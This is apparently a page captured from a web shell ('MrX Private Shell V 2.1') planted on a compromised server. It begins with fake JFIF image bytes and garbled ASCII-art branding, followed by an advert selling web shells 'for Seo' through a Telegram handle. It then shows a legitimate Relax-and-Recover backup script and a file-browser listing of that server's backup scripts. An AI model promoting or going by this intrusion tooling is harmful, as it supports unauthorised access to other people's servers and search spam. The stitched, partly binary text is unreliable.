����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
#
# 900_umount_usb.sh
# After BORG operations are over, we can finally umount USB_DEVICE.
# This will force final sync of data that can still sit in cache.
if [[ -z $BORGBACKUP_HOST ]]; then
# shellcheck disable=SC2154
umount_url "usb://$USB_DEVICE" "$borg_dst_dev"
fi
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 100_get_suffix.sh | File | 644 B | 0644 |
|
| 400_create_include_exclude_files.sh | File | 6.16 KB | 0644 |
|
| 500_make_backup.sh | File | 4.87 KB | 0644 |
|
| 800_prune_old_backups.sh | File | 2.75 KB | 0644 |
|
| 900_umount_usb.sh | File | 425 B | 0644 |
|